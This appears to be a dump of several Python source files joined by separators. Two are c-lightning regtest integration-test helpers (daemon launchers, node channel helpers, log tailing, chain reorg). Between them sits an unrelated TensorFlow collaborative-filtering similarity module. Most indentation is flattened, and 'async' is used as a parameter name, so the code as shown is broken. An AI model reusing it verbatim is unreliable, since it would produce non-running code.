# lightning-1 => 0266e4598d1d3c415f572a8488830b60f7e744ed9235eb0b1ba93283b315c03518 aka JUNIORBEAM #0266e4
# lightning-2 => 022d223620a359a47ff7f7ac447c85c46c923da53389221a0054c11c1e3ca31d59 aka SILENTARTIST #022d22
# lightning-3 => 035d2b1192dfba134e10e540875d366ebc8bc353d5aa766b80c090b39c3a5d885d aka HOPPINGFIRE #035d2b
# lightning-4 => 0382ce59ebf18be7d84677c2e35f23294b9992ceca95491fcf8a56c6cb2d9de199 aka JUNIORFELONY #0382ce
# lightning-5 => 032cf15d1ad9c4a08d26eab1918f732d8ef8fdc6abb9640bf3db174372c491304e aka SOMBERFIRE #032cf1
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoin_dir, port=9735, random_hsm=False):
TailableProc.__init__(self, lightning_dir)
self.lightning_dir = lightning_dir
self.port = port
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
self.cmd_line = [
'lightningd/lightningd',
'--bitcoin-datadir={}'.format(bitcoin_dir),
'--lightning-dir={}'.format(lightning_dir),
'--port={}'.format(port),
'--allow-deprecated-apis=false',
'--override-fee-rates=15000/7500/1000',
'--network=regtest',
'--ignore-fee-limits=false'
]
if DEVELOPER:
self.cmd_line += ['--dev-broadcast-interval=1000']
if not random_hsm:
self.cmd_line += ['--dev-hsm-seed={}'.format(binascii.hexlify(seed).decode('ascii'))]
self.cmd_line += ["--{}={}".format(k, v) for k, v in sorted(LIGHTNINGD_CONFIG.items())]
self.prefix = 'lightningd(%d)' % (port)
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
def start(self):
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
# Use batch if you're doing more than one async.
def connect(self, remote_node, capacity, async=False):
# Collect necessary information
addr = self.rpc.newaddr()['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, capacity)
tx = self.bitcoin.rpc.gettransaction(txid)
start_size = self.bitcoin.rpc.getmempoolinfo()['size']
def call_connect():
try:
self.rpc.connect('127.0.0.1', remote_node.daemon.port, tx['hex'], async=False)
except Exception:
pass
t = threading.Thread(target=call_connect)
t.daemon = True
t.start()
def wait_connected():
# Up to 10 seconds to get tx into mempool.
start_time = time.time()
while self.bitcoin.rpc.getmempoolinfo()['size'] == start_size:
if time.time() > start_time + 10:
raise TimeoutError('No new transactions in mempool')
time.sleep(0.1)
self.bitcoin.generate_block(1)
# fut.result(timeout=5)
# Now wait for confirmation
self.daemon.wait_for_log(" to CHANNELD_NORMAL|STATE_NORMAL")
remote_node.daemon.wait_for_log(" to CHANNELD_NORMAL|STATE_NORMAL")
if async:
return self.executor.submit(wait_connected)
else:
return wait_connected()
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit"):
addr, wallettxid = self.fundwallet(capacity, addrtype)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
self.daemon.wait_for_log('sendrawtx exit 0, gave')
self.bitcoin.generate_block(6)
self.daemon.wait_for_log('to CHANNELD_NORMAL|STATE_NORMAL')
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**6)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
from shutil import copyfile
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
copyfile(orig, copy)
db = sqlite3.connect(copy)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.daemon.start()
|
iterativeCF.py
|
import numpy as np
import pandas as pd
import tensorflow as tf
import time, sys, datetime, copy, math, os
from threading import Thread
from multiprocessing import Process
import logging
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '3'
log = logging.getLogger('root')
class cf_similarity(object):
def __init__(self, mat1, mat2, sim_col: str, ftr_col='FTR', val_col='RATE', log_level=logging.WARN):
        """
        1) input matrix 1 : contains the users (items) for which we want to find similar users (items)
        2) input matrix 2 : contains the candidate users (items) to be matched against matrix 1
        3) sim_col : column name of users/items in matrices 1 and 2
        4) ftr_col : column name of items/users in matrices 1 and 2
        5) val_col : column name of the value for ftr_col (e.g. view, usage or purchase count)
        * Items are typically goods / videos / coupons, etc.; users are the people who consume them.
        ex) mat1 x mat2 = sim_mat
        [sim_col x ftr_col] x [ftr_col x sim_col] = [sim_col x sim_col]
        * The same column names must exist in both matrices.
        usage1) For user-based similarity,
        items are used as the feature set to compute a similarity score for each user.
        [sim_col, ftr_col, val_col] = ['CLNN', 'FTR', 'RATE']
        usage2) For item-based similarity,
        users are used as the feature set to compute a similarity score for each item (store/video).
        [sim_col, ftr_col, val_col] = ['ITEM', 'FTR', 'RATE']
        default) Item based similarity: column names are expected to be 'CLNN', 'FTR', 'RATE';
        for user based similarity, 'ITEM', 'FTR', 'RATE'.
        """
log.setLevel(log_level)
log.info('cf init data loading ...')
self.SIM_COLNAME = sim_col
start_time = time.time()
self.mat1 = mat1[[sim_col, ftr_col, val_col]]
self.mat2 = mat2[[sim_col, ftr_col, val_col]]
self.mat1.columns = ['TGT', 'FTR', 'RATE']
self.mat2.columns = ['TGT', 'FTR', 'RATE']
ftrs = pd.unique(pd.concat([self.mat1, self.mat2])['FTR'])
ftrs_map = pd.DataFrame({
'FTR': ftrs,
'FTR_IDX': range(len(ftrs))
})
mat1_targets = pd.unique(self.mat1['TGT'])
mat1_target_map = pd.DataFrame({
'TGT': mat1_targets,
'MAT1_TGT_IDX': range(len(mat1_targets))
})
mat2_targets = pd.unique(self.mat2['TGT'])
mat2_target_map = pd.DataFrame({
'TGT': mat2_targets,
'MAT2_TGT_IDX': range(len(mat2_targets))
})
self.ftrs_count = len(ftrs)
self.mat1_targets_count = len(mat1_targets)
self.mat2_targets_count = len(mat2_targets)
log.info('# of targets in 1st matrix: %d' % self.mat1_targets_count)
log.info('# of features: %d' % self.ftrs_count)
log.info('# of references in 2nd matrix: %d' % self.mat2_targets_count)
log.info('indexing 1st matrix ...')
self.mat1 = pd.merge(self.mat1, mat1_target_map, how='left')
self.mat1 = pd.merge(self.mat1, ftrs_map)
self.mat1 = self.mat1[['MAT1_TGT_IDX', 'TGT', 'FTR_IDX', 'RATE']]
self.mat1 = self.mat1.sort_values(by=['MAT1_TGT_IDX', 'FTR_IDX'])
log.info('indexing 2nd matrix ...')
self.mat2 = pd.merge(self.mat2, mat2_target_map, how='left')
self.mat2 = pd.merge(self.mat2, ftrs_map)
self.mat2 = self.mat2[['MAT2_TGT_IDX', 'TGT', 'FTR_IDX', 'RATE']]
self.mat2 = self.mat2.sort_values(by=['MAT2_TGT_IDX', 'FTR_IDX'])
log.info('normalizing 1st matrix ...')
# L2-Normalize
distances = self.mat1.assign(DISTANCE=self.mat1['RATE'] ** 2).groupby('TGT')['DISTANCE'].sum().transform(
math.sqrt)
distances = distances.to_frame().reset_index(level=0)
self.mat1 = pd.merge(self.mat1, distances, how='left')
self.mat1 = self.mat1.assign(NORMED_RATE=self.mat1['RATE'] / self.mat1['DISTANCE'])
log.info('normalizing 2nd matrix ...')
distances = self.mat2.assign(DISTANCE=self.mat2['RATE'] ** 2).groupby('TGT')['DISTANCE'].sum().transform(
math.sqrt)
distances = distances.to_frame().reset_index(level=0)
self.mat2 = pd.merge(self.mat2, distances, how='left')
self.mat2 = self.mat2.assign(NORMED_RATE=self.mat2['RATE'] / self.mat2['DISTANCE'])
log.info('building indices ...')
self.target_map1 = mat1_target_map.set_index('MAT1_TGT_IDX')['TGT'].to_dict()
self.target_map2 = mat2_target_map.set_index('MAT2_TGT_IDX')['TGT'].to_dict()
log.info('setup time elapsed : %.2f secs' % (time.time() - start_time))
def calc(self, k, filename_to_save, slicing1=2000, slicing2=50000, append=False, trace=False, mode='gpu', axis=0):
calc_time = time.time()
# reset previous graph
tf.reset_default_graph()
if not append and os.path.isfile(filename_to_save):
os.remove(filename_to_save)
if not os.path.isfile(filename_to_save) and axis == 0:
with open(filename_to_save, 'a') as f:
                f.write('%s,SIM_%s,SCORE\n' % (self.SIM_COLNAME, self.SIM_COLNAME))
if mode == 'cpu':
os.environ["CUDA_VISIBLE_DEVICES"] = ""
session_conf = tf.ConfigProto(
intra_op_parallelism_threads=28,
inter_op_parallelism_threads=28)
elif mode == 'gpu1':
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
session_conf = tf.ConfigProto()
else:
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
session_conf = tf.ConfigProto()
RANK_TO_SAVE = k
SLICE1_SIZE = slicing1
SLICE2_SIZE = slicing2
FEATURE_SIZE = self.ftrs_count
FIRST_ITERATION_COUNT = math.ceil(self.mat1_targets_count / SLICE1_SIZE)
SECOND_ITERATION_COUNT = math.ceil(self.mat2_targets_count / SLICE2_SIZE)
log.info('# of iteration in 1st matrix : %d' % FIRST_ITERATION_COUNT)
log.info('# of iteration in 2nd matrix : %d' % SECOND_ITERATION_COUNT)
self.mat1['MAT1_SLICE_IDX'] = self.mat1['MAT1_TGT_IDX'].map(lambda x: x % SLICE1_SIZE)
self.mat2['MAT2_SLICE_IDX'] = self.mat2['MAT2_TGT_IDX'].map(lambda x: x % SLICE2_SIZE)
self.mat1['MAT1_ITERATION'] = self.mat1['MAT1_TGT_IDX'].map(lambda x: x // SLICE1_SIZE)
self.mat2['MAT2_ITERATION'] = self.mat2['MAT2_TGT_IDX'].map(lambda x: x // SLICE2_SIZE)
MAT1_SHAPE = (SLICE1_SIZE, FEATURE_SIZE)
MAT2_SHAPE = (SLICE2_SIZE, FEATURE_SIZE)
writing_thread = None
for idx1 in range(FIRST_ITERATION_COUNT):
start1 = time.time()
START_TARGET_IDX1 = idx1 * SLICE1_SIZE
mat1_sample = self.mat1[self.mat1['MAT1_ITERATION'] == idx1]
np_mat1_indices = np.array(mat1_sample[['MAT1_SLICE_IDX', 'FTR_IDX']], dtype=np.int64)
np_mat1_values = np.array(mat1_sample['NORMED_RATE'], dtype=np.float64)
log.info('STAGE %d mat1 %s prepared' % (idx1 + 1, str(MAT1_SHAPE)))
### tf setup
sess = tf.Session(config=session_conf)
tf_top_k = tf.placeholder(tf.int32, name="tf_top_k")
tf_base_idx = tf.placeholder(tf.int32, name="tf_base_idx")
with tf.variable_scope("mat1", reuse=tf.AUTO_REUSE):
tf_mat1_dense_shape = tf.placeholder(tf.int64, [2])
tf_mat1_indices = tf.placeholder(tf.int64, [None, None])
tf_mat1_values = tf.placeholder(tf.float64, [None])
tf_mat1_sparse = tf.sparse.SparseTensor(indices=tf_mat1_indices, values=tf_mat1_values,
dense_shape=tf_mat1_dense_shape)
tf_mat1 = tf.get_variable("tf_mat1", shape=MAT1_SHAPE, dtype=tf.float64)
assign_op = tf_mat1.assign(tf.sparse.to_dense(tf_mat1_sparse, default_value=0))
with tf.variable_scope("mat2"):
tf_mat2_dense_shape = tf.placeholder(tf.int64, [2])
tf_mat2_indices = tf.placeholder(tf.int64, [None, None])
tf_mat2_values = tf.placeholder(tf.float64, [None])
tf_mat2_sparse = tf.sparse.SparseTensor(indices=tf_mat2_indices, values=tf_mat2_values,
dense_shape=tf_mat2_dense_shape)
tf_mat2 = tf.sparse.to_dense(tf_mat2_sparse, default_value=0)
with tf.variable_scope("mat3", reuse=tf.AUTO_REUSE):
tf_prev_indices = tf.get_variable("tf_prev_indices", shape=[SLICE1_SIZE, RANK_TO_SAVE], dtype=tf.int32)
tf_prev_values = tf.get_variable("tf_prev_values", shape=[SLICE1_SIZE, RANK_TO_SAVE], dtype=tf.float64)
tf_result_dense = tf.matmul(tf_mat1,
tf_mat2,
transpose_a=False,
transpose_b=True,
a_is_sparse=True,
b_is_sparse=True)
tf_loop_result = tf.nn.top_k(tf_result_dense, k=tf_top_k, sorted=True)
# add up current loop2 index
tf_mat3_indices = tf.concat([tf.add(tf_loop_result.indices, tf_base_idx), tf_prev_indices], 1)
tf_mat3_values = tf.concat([tf_loop_result.values, tf_prev_values], 1)
tf_result = tf.nn.top_k(tf_mat3_values, k=tf_top_k, sorted=True)
# tf_result_values = tf_result.values
_idx = tf_result.indices
_rows = tf.broadcast_to(tf.expand_dims(tf.range(tf.shape(tf_result.values)[0]), 1), tf.shape(_idx))
_ex_idx = tf.concat((tf.expand_dims(_rows, 2), tf.expand_dims(_idx, 2)), axis=2)
tf_result_indices = tf_prev_indices.assign(tf.gather_nd(tf_mat3_indices, _ex_idx))
tf_result_values = tf_prev_values.assign(tf_result.values)
# load mat1 (reuse in loop2)
sess.run(tf.global_variables_initializer())
sess.run(assign_op, feed_dict={
tf_mat1_indices: np_mat1_indices,
tf_mat1_values: np_mat1_values,
tf_mat1_dense_shape: MAT1_SHAPE
})
sampling_time, tf_time = 0, 0
ret_values, ret_indices = [[0.0] * RANK_TO_SAVE] * SLICE1_SIZE, [[0] * RANK_TO_SAVE] * SLICE1_SIZE
sample2_thread = None
            # initial sampling for slice2
self.sample_mat2(0)
LAST_ITERATION = SECOND_ITERATION_COUNT - 1
for idx2 in range(SECOND_ITERATION_COUNT):
                # sampling runs on a separate thread so it can proceed while the GPU is busy
sampling_start = time.time()
if sample2_thread is not None:
sample2_thread.join()
np_mat2_indices = self.next_mat2_indices
np_mat2_values = self.next_mat2_values
if idx2 < LAST_ITERATION:
sample2_thread = Thread(target=self.sample_mat2, args=(idx2 + 1,))
sample2_thread.start()
sampling_time += time.time() - sampling_start
tf_start = time.time()
START_TARGET_IDX2 = idx2 * SLICE2_SIZE
dict_to_feed = {tf_mat2_indices: np_mat2_indices,
tf_mat2_values: np_mat2_values,
tf_mat2_dense_shape: MAT2_SHAPE,
tf_base_idx: START_TARGET_IDX2,
tf_top_k: RANK_TO_SAVE if RANK_TO_SAVE < SLICE2_SIZE else SLICE2_SIZE
}
if idx2 == LAST_ITERATION:
ret_values, ret_indices = sess.run([tf_result_values, tf_result_indices],
feed_dict=dict_to_feed)
else:
sess.run([tf_result_values.op, tf_result_indices.op],
feed_dict=dict_to_feed)
tf_time += time.time() - tf_start
sess.close()
log.info('STAGE %d LOOP %d mat2 %s processed (%.2f / %.2f secs elapsed)' % (
idx1 + 1, idx2 + 1, str(MAT2_SHAPE), sampling_time, tf_time))
# cut off the dummy values in the last loop
if idx1 == (FIRST_ITERATION_COUNT - 1):
# SLICE1_SIZE = self.mat1_targets_count % SLICE1_SIZE
SLICE1_SIZE = self.mat1_targets_count % SLICE1_SIZE if self.mat1_targets_count != SLICE1_SIZE else self.mat1_targets_count
ret_values = ret_values[:SLICE1_SIZE, :]
ret_indices = ret_indices[:SLICE1_SIZE, :]
if trace:
self.ret_values, self.ret_indices = ret_values, ret_indices
print(ret_values[:3, :100])
print(ret_indices[:3, :100])
break
if writing_thread is not None:
writing_thread.join()
# writing_thread = Process(target=self.write_result, args=(idx1+1, ret_values, ret_indices, START_TARGET_IDX1, RANK_TO_SAVE, filename_to_save, axis))
writing_thread = Process(target=self.write_result, args=(
idx1 + 1, copy.deepcopy(ret_values), copy.deepcopy(ret_indices), START_TARGET_IDX1, RANK_TO_SAVE,
filename_to_save, axis))
writing_thread.start()
log.info('STAGE %d total elapsed time %.2f sec' % (idx1 + 1, time.time() - start1))
if writing_thread is not None:
writing_thread.join()
log.info('similarity iteration done : %.2f secs elapsed' % (time.time() - calc_time))
def sample_mat2(self, idx2):
mat2_sample = self.mat2[self.mat2['MAT2_ITERATION'] == idx2]
self.next_mat2_indices = np.array(mat2_sample[['MAT2_SLICE_IDX', 'FTR_IDX']], dtype=np.int64)
self.next_mat2_values = np.array(mat2_sample['NORMED_RATE'], dtype=np.float64)
def write_result(self, stage, ret_values, ret_indices, start_target_idx1, rank_to_save, filename_to_save, axis=0):
writing_time = time.time()
with open(filename_to_save, 'a') as fw:
if axis == 1:
for user_idx in range(len(ret_values)):
tgt_id = self.target_map1.get(start_target_idx1 + user_idx)
sim_users, sim_scores = [], []
for loop_idx in range(0, len(ret_values[user_idx])):
sim_users.append(self.target_map2.get(ret_indices[user_idx][loop_idx]))
sim_scores.append(ret_values[user_idx][loop_idx])
# fw.write('%s,%s,%.6f' % (tgt_id, self.target_map2.get(ret_indices[user_idx][loop_idx]), ret_values[user_idx][loop_idx]))
                    fw.write('%s,%s,%s\n' % (tgt_id, ','.join(sim_users), ','.join(['%.6f' % x for x in sim_scores])))
else:
for user_idx in range(len(ret_values)):
tgt_id = self.target_map1.get(start_target_idx1 + user_idx)
for loop_idx in range(0, len(ret_values[user_idx])):
                        fw.write('%s,%s,%.6f\n' % (tgt_id, self.target_map2.get(ret_indices[user_idx][loop_idx]), ret_values[user_idx][loop_idx]))
log.info('STAGE %d result mat %s has been written (%.2f elapsed)' % (
stage, str(ret_values.shape), time.time() - writing_time))
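# ---------------------------------------------------------------------------
# Usage sketch (illustrative only, not part of the original module): a minimal
# way to drive cf_similarity for item-based similarity. The DataFrame contents
# and the output file name below are hypothetical toy values.
if __name__ == '__main__':
    ratings = pd.DataFrame({
        'ITEM': ['a', 'a', 'b', 'b', 'c'],
        'FTR': ['u1', 'u2', 'u1', 'u3', 'u2'],
        'RATE': [1.0, 2.0, 1.0, 3.0, 1.0],
    })
    # The same frame is used as both the target and the reference matrix, so
    # every item is scored against every other item (including itself).
    sim = cf_similarity(ratings, ratings, sim_col='ITEM', ftr_col='FTR', val_col='RATE',
                        log_level=logging.INFO)
    # Keep the top-2 matches per item; tiny slice sizes just for the toy data.
    sim.calc(k=2, filename_to_save='item_similarity.csv', slicing1=2, slicing2=3, mode='cpu')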
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
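# Example (illustrative): every attribute lookup builds a fresh throwaway
# proxy, so each RPC call below uses its own short-lived connection. The
# config path is a placeholder.
#
#     rpc = SimpleBitcoinProxy(btc_conf_file='/tmp/bitcoind-test/bitcoin.conf')
#     height = rpc.getblockcount()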
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
    # wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
    # int > 0 := wait for at least N transactions
    # 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs are in the mempool
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
